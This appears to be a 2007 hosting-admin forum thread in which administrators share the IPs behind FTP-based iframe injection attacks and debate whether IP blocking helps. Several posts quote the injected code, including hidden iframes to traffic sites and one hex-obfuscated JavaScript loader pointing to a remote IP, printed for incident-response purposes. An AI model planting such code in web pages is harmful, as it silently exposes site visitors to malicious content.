IP addresses from IFrame Hacks

Puggs

Member
Oct 1, 2007
13
0
51
Hi

66.36.241.185 8:30pm Australian Eastern Standard Time +10:00 1st Oct
66.36.241.185 4:20am Australian Eastern Standard Time +10:00 2st Oct
 

d_t

Well-Known Member
Sep 20, 2003
245
3
168
Bucharest
81.95.149.75 - October, 2 2007
(client confirmed he used FTP from an infected PC the day before)
 

wkdwich

Well-Known Member
Apr 11, 2005
105
0
166
Since June, the ones I have caught:


12.130.132.229
132.239.235.55
195.133.109.227
202.151.177.83
203.121.67.164
203.223.159.210
210.188.204.80
211.118.175.22
211.63.65.46
217.118.82.41
217.170.77.210
217.195.87.197
221.201.100.253
24.82.147.206
58.65.235.105
61.183.247.7
69.11.37.86
69.41.162.77
69.50.180.186
71.242.248.228
72.37.179.44
80.81.208.67
81.177.4.34
82.75.59.65
84.164.206.37
 

rvskin

Well-Known Member
PartnerNOC
Feb 19, 2003
400
1
168
Here is my collection.

66.246.218.145 # Sep 09 2007
84.16.252.163 # Aug 29 2007
194.83.36.2 # Aug 30 2007
69.41.162.77 # Sep 27 2007
213.27.26.11 # Sep 27 2007
116.0.103.111 # Oct 9 2007
202.164.52.199 # Oct 9 2007
 

Imai

Well-Known Member
Aug 11, 2003
45
0
156
81.95.150.178 on October 8

<IFRAME name='StatPage' src='http://www.911traff.com/trf/traf.php' width=5 height=5 style='display:none'></IFRAME>

looks like a one off case as I am still checking the other accounts and logs
 
Last edited:

Infopro

Well-Known Member
May 20, 2003
17,107
515
613
Pennsylvania
cPanel Access Level
Root Administrator
Twitter
Thanks for the information.

Keep it coming. :)

I don't want to sound pessimistic here, or take this thread too far off topic, but is posting these IPs really going to be helpful? Anyone who watches their logs can tell you the hits just keep on coming, block one another pops up. Block 130 (my max for CSF entries to blocked list) another 130 more blocked next month.

Soon as they are found out at hopone or ipowerweb or rbnnetwork or netdirekt.de or hostfresh.com or any one of a zillion other places, they're already setup on someone else's server continuing to do what they do.

Trying to track down how its happening is a good thing, keeping track of IPs may be good as well, but this'll go on forever. (the thread)

Wouldn't it be more advantageous to all concerned if we as system administrators were sharing our security tips instead? A nice long thread with the top security tips would surely be more helpful, IMHO of course.

For one example, many have Fantastico installed, but did you know that just because Fantastico tells you all files are up to date, and all installations are listed as up to date, that doesn't mean squat? Users will install components to Joomla that are very buggy and can be cracked:
http://help.joomla.org/component/option,com_easyfaq/task,view/id,186/Itemid,268/

That's just one example, there are thousands of examples we could be sharing that I think might really be more helpful than this list of IPs.


We're all in this boat together here as cPanel admins, and while sharing tips might be actually helping your competition in this hosting business, at the same time those who have no clues about security are a huge part of the reason others of us are having problems.

Some kid (no offense kids) gets his own cPanel server, gives all his buddies free accounts and they get broke into because that kid didn't secure his server properly and his buddies are so excited to have a free account they install everything under the sun without knowing the consequences. And the end result is what we're all discussing here.

cPanel is great stuff, but installing it and using the built in security is not enough. Not by a long shot. I watch my logs via WHM daily, using logview, I get system logs by mail every hour, and I can tell you the hits just keep on coming, every hour every day every month.

You can block IPs until the cows come home, that's not going to keep you secure.

Anyway, sorry for the rant, just my 2.
 

rpmws

Well-Known Member
Aug 14, 2001
1,815
9
318
back woods of NC, USA
I don't want to sound pessimistic here, or take this thread too far off topic, but is posting these IPs really going to be helpful? Anyone who watches their logs can tell you the hits just keep on coming, block one another pops up. Block 130 (my max for CSF entries to blocked list) another 130 more blocked next month.

Soon as they are found out at hopone or ipowerweb or rbnnetwork or netdirekt.de or hostfresh.com or any one of a zillion other places, they're already setup on someone else's server continuing to do what they do.

Trying to track down how its happening is a good thing, keeping track of IPs may be good as well, but this'll go on forever. (the thread)

Wouldn't it be more advantageous to all concerned if we as system administrators were sharing our security tips instead? A nice long thread with the top security tips would surely be more helpful, IMHO of course.

For one example, many have Fantastico installed, but did you know that just because Fantastico tells you all files are up to date, and all installations are listed as up to date, that doesn't mean squat? Users will install components to Joomla that are very buggy and can be cracked:
http://help.joomla.org/component/option,com_easyfaq/task,view/id,186/Itemid,268/

That's just one example, there are thousands of examples we could be sharing that I think might really be more helpful than this list of IPs.


We're all in this boat together here as cPanel admins, and while sharing tips might be actually helping your competition in this hosting business, at the same time those who have no clues about security are a huge part of the reason others of us are having problems.

Some kid (no offense kids) gets his own cPanel server, gives all his buddies free accounts and they get broke into because that kid didn't secure his server properly and his buddies are so excited to have a free account they install everything under the sun without knowing the consequences. And the end result is what we're all discussing here.

cPanel is great stuff, but installing it and using the built in security is not enough. Not by a long shot. I watch my logs via WHM daily, using logview, I get system logs by mail every hour, and I can tell you the hits just keep on coming, every hour every day every month.

You can block IPs until the cows come home, that's not going to keep you secure.

Anyway, sorry for the rant, just my 2.
you are correct !! I agree with you almost 100% with everything you said in general except one thing. These ftp login defacements or whatever you want to call them, come from legit logins that have been snatched from locally exploited machines. (i think) (or a compromised billing system that stores logins) .At least that is what I have always thought. If that is the case ..then the only way to keep them out is to either block or disable FTP or block the known IP(s) they came in from.
 

Todd Mitchell

Well-Known Member
Staff member
Nov 13, 2006
301
1
243
Houston, TX
Feel free to start a new post where admins can post security tips, helpful notes etc.

We are asking for attacking IPs in this thread for information gathering purposes. We aren't creating a list of IP's to delete or anything like that. We just need a few IP's that are known to attack several different servers to help us gain an understanding about whats occurring during the attacks and how they are being propagated. :)
 

mooony

Well-Known Member
Nov 9, 2002
82
0
156
I have this morning 4 servers infected with iframes. These accounts where accessed by ftp.

ip: 58.65.239.10

PHP:
<iframe src='http://ltraffic.biz/resource.php?id=4531&user=Nikson' width='1' height='1' style='visibility: hidden;'></iframe>
I hope this helps.

Ronald
 

sehh

Well-Known Member
Feb 11, 2006
579
5
168
Europe
we've seen lots of ftp attacks from: 72.95.215.3
 

mtindor

Well-Known Member
Sep 14, 2004
1,378
69
178
inside a catfish
cPanel Access Level
Root Administrator
I have this morning 4 servers infected with iframes. These accounts where accessed by ftp.

ip: 58.65.239.10

PHP:
<iframe src='http://ltraffic.biz/resource.php?id=4531&user=Nikson' width='1' height='1' style='visibility: hidden;'></iframe>
I hope this helps.

Ronald
What percentage of accounts on each server? or are you saying EVERY account on four servers had this happen?

Mike
 

d_t

Well-Known Member
Sep 20, 2003
245
3
168
Bucharest
FTP connection with user password from: 77.221.133.186

code added to index.htnl
Code:
<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v4757fc58cd991(v4757fc58ce18a){ function v4757fc58ce999 () {return 16;} return(parseInt(v4757fc58ce18a,v4757fc58ce999()));}function v4757fc58cf989(v4757fc58d0183){ var v4757fc58d1171=2; var v4757fc58d097a='';for(v4757fc58d0d7d=0; v4757fc58d0d7d<v4757fc58d0183.length; v4757fc58d0d7d+=v4757fc58d1171){ v4757fc58d097a+=(String.fromCharCode(v4757fc58cd991(v4757fc58d0183.substr(v4757fc58d0d7d, v4757fc58d1171))));}return v4757fc58d097a;} document.write(v4757fc58cf989('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D633737386536356239373065207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313936353936292B273031665C272077696474683D353136206865696768743D333831207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>
code contain links to:
Code:
http://77.221.133.188/.if/go.html?19427401f
http://77.221.133.188/.dif/go.php?sid=1
http://77.221.133.189/.sp/in.cgi?p=t